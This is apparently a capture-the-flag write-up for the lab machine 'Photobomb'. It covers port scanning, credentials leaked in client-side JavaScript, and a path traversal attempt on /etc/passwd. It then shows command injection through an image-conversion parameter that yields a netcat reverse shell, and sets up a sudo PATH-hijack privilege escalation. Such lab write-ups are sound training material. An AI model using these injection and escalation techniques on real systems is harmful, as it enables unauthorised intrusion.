Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-05 15:57 CST
Nmap scan report for 10.10.11.182
Host is up (0.13s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 e2:24:73:bb:fb:df:5c:b5:20:b6:68:76:74:8a:b5:8d (RSA)
| 256 04:e3:ac:6e:18:4e:1b:7e:ff:ac:4f:e3:9d:d2:1b:ae (ECDSA)
|_ 256 20:e0:5d:8c:ba:71:f0:8c:3a:18:19:f2:40:11:d2:9e (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://photobomb.htb/
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=12/5%OT=22%CT=1%CU=34665%PV=Y%DS=2%DC=I%G=Y%TM=638E699
OS:B%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=10B%TI=Z%CI=Z%II=I%TS=A)SEQ
OS:(CI=Z)OPS(O1=M539ST11NW7%O2=M539ST11NW7%O3=M539NNT11NW7%O4=M539ST11NW7%O
OS:5=M539ST11NW7%O6=M539ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6
OS:=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M539NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O
OS:%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=
OS:0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%
OS:S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(
OS:R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=
OS:N%T=40%CD=S)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 52.18 seconds
/etc/hosts
10.10.11.182 photobomb.htb
$ nikto -h photobomb.htb
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP: 10.10.11.182
+ Target Hostname: photobomb.htb
+ Target Port: 80
+ Start Time: 2022-12-05 16:33:14 (GMT-6)
---------------------------------------------------------------------------
+ Server: nginx/1.18.0 (Ubuntu)
+ Uncommon header 'x-frame-options' found, with contents: SAMEORIGIN
+ Uncommon header 'x-content-type-options' found, with contents: nosniff
+ Uncommon header 'x-xss-protection' found, with contents: 1; mode=block
+ Uncommon header 'x-cascade' found, with contents: pass
+ No CGI Directories found (use '-C all' to force check all possible dirs)
Web Server
The home page (http://photobomb.htb/) contains a link to /printer, yet this asks for HTTP basic authentication. Let's keep looking.
photobomb.js includes a regex check for a specific cookie and sets the needed credentials to access /printer:
photobomb.js
// Jameson: pre-populate creds for tech support as they keep forgetting them and emailing me
if (document.cookie.match(/^(.*;)?\s*isPhotoBombTechSupport\s*=\s*[^;]+(.*)?$/)) {
document.getElementsByClassName('creds')[0].setAttribute('href','REDACTED');
}
You could set the cookie with document.cookie and reload the page or copy the creds and log in manually. Either way, logging in, we see a simple form. You pick a picture, pick the file type, size, then Download. Looking at DevTools Network tab, the Download button sends a POST request to /printer with these queries:
The photo field suggests a possible path traversal attack. Let's test it with BurpSuite.
Request
POST /printer HTTP/1.1
Host: photobomb.htb
Content-Length: 79
...
Content-Type: application/x-www-form-urlencoded
Cookie: isPhotoBombTechSupport=TRUE
special-dev: only4dev
Authorization: Basic REDACTED
Connection: close
photo=../../../../../../../../../../../etc/passwd&filetype=png&dimensions=30x20
Response
HTTP/1.1 500 Internal Server Error
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 05 Dec 2022 22:26:21 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 14
Connection: close
X-Xss-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Invalid photo.
After a few tries in BurpSuite's Repeater trying different URL encoded and unencoded parameter values for photo, I couldn't get a good response other than a 500. Time to look harder.
How about the other params? It's possible these params are arguments to a command call such as ffmpeg or ImageMagick convert. How about some good ol' RCE exploitation?
Let's open up a nc listener on our machine, encode the payload for URL, append it into the filetype query field, and see if it works.
$ nc -lvkp 4242
listening on [any] 4242 ...
connect to [10.10.16.52] from photobomb.htb [10.10.11.182] 59346
bash: cannot set terminal process group (700): Inappropriate ioctl for device
bash: no job control in this shell
wizard@photobomb:~/photobomb$
After trying a couple of different payloads, this mkfifo pipe seemed to work. You can see the payload description and comments here.
Loot Gathering
Now that we have a bash shell in the wizard user, we should look around. For curiosity sake, I looked at the server.rb file to check out the vulnerabilities we exploited.
~/photobomb/server.rb
...
if !filetype.match(/^(png|jpg)/) # Weak regex
halt 500, 'Invalid filetype.'
end
filename = photo.sub('.jpg', '') + '_' + dimensions + '.' + filetype
...
if !File.exists?('resized_images/' + filename)
# the parameters are unsafely used in a system() call, thus allowing RCE injection
command = 'convert source_images/' + photo + ' -resize ' + dimensions + ' resized_images/' + filename
system(command)
...
end
Alright, back to looting. Heading over to wizard's home directory, we can grab the user flag and move on to root.
Privilege Escalation
I thought about spinning up LinPEAS and then kick back, but I wanted to learn more about privilege escalation within a Linux box. Time to go through the Linux Privilege Escalation Checklist
Nothing too interesting from printenv. Let's get OS info and move on to enumerating possible kernel exploits.
$ uname -a
Linux photobomb 5.4.0-126-generic #142-Ubuntu SMP Fri Aug 26 12:12:57 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
Searchsploit didn't give anything promising for Linux kernel 5.4.0, but I might come back later. For now, let's try linux-exploit-suggester
A bunch of results. Let's also come back to that later. We'll continue down the list. How about checking sudo privileges?
wizard@photobomb:~$ sudo -l
...
User wizard may run the following commands on photobomb:
(root) SETENV: NOPASSWD: /opt/cleanup.sh
SETENV will preserve the sudoer's (in this case, wizard) environment. Keep note of that. And of course, sudo will not ask for a password executing this script with the NOPASSWD flag. Wonderful.
/opt/cleanup.sh
#!/bin/bash
. /opt/.bashrc
cd /home/wizard/photobomb
# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
/bin/cat log/photobomb.log > log/photobomb.log.old
/usr/bin/truncate -s0 log/photobomb.log
fi
# protect the priceless originals
find source_images -type f -name '*.jpg' -exec chown root:root {} \;
Alright, we see something interesting here. If you look closely, most of these commands have absolute paths to their binaries. I'm gonna assume these are not writeable. But that find call is not an absolute call? Let's do some unsafe PATH environment manipulation knowing sudo is preserving the user's environment when it goes privileged.
